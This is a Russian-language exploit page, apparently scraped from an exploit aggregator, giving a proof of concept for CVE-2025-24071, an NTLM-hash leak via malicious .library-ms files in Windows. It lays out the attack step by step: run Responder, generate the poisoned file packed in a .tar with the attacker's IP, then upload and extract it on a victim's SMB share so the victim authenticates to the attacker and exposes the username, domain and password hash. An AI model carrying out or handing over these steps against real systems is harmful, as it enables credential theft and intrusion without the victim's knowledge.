## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-EX-CAL1BUR-SMB_CVE-2025-24071
# CVE-2025-24071 PoC (SMB + Метод извлечения TAR)
Это PoC для эксплуатации **CVE-2025-24071** , уязвимости в Windows, которая позволяет утечку NTLM-хэша через файлы `.library-ms`. Эта версия немного отличается от других тем, что использует архив `.tar` вместо `.zip`, что улучшает совместимость в средах, где доступен только SMB.
## 📌 Почему `.tar`, а не `.zip`?
Большинство публичных PoC используют `.zip` для упаковки вредоносного файла `.library-ms`. Однако, если вы работаете в ограниченной SMB-среде (например, доступ только через `smbclient`), ZIP-файлы невозможно извлечь удалённо. Используя архив `.tar`, вы можете распаковать полезную нагрузку напрямую из SMB-шары с помощью команды `tar`, встроенной в `smbclient`, что позволяет удалённо развернуть атаку **без необходимости взаимодействия с пользователем**.
* * *
## 🔧 Требования
* Машина атакующего с:
* Установленным и запущенным `Responder`
* SMB-сервером (например, `Responder`, `impacket-smbserver` или `samba`)
* Машина жертвы:
* Windows с включённым доступом по SMB к IP атакующего
* * *
## 🧪 Шаги
### 1\. Запуск Responder
Запустите Responder на правильном интерфейсе:
root@kitploit:~
sudo responder -I <interface>
Убедитесь, что IP в полезной нагрузке соответствует этому интерфейсу.
### 2\. Создание вредоносного .library-ms и упаковка в .tar
root@kitploit:~
python3 create_tar_poc.py
Вас попросят ввести:
* Имя файла (например, exploit)
* IP атакующего (например, 192.168.1.100)
Будут созданы:
* exploit.library-ms (внутри exploit.tar)
* exploit.tar
### 3\. Загрузка и извлечение на SMB-шару жертвы
С машины атакующего подключитесь к SMB-шаре жертвы с помощью smbclient:
root@kitploit:~
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
Это распакует .library-ms в общую папку.
Когда exploit.tar будет извлечён, файл .library-ms, содержащий вредоносный XML, подключится к нашему SMB (активному Responder на нашей машине), тем самым запустив попытку аутентификации через NTLM путём отправки запроса, содержащего имя пользователя, домен и NTLM-хэш пароля пользователя, который мы впоследствии сможем расшифровать.
## 📽️ Видео PoC
Скоро...
## 🙏 Благодарности
Даниэль Миранда Барселона, также известный как Excal1bur | Основано на оригинальной работе 0x6rss, адаптировано для развёртывания через TAR по SMB в лабораторных сценариях.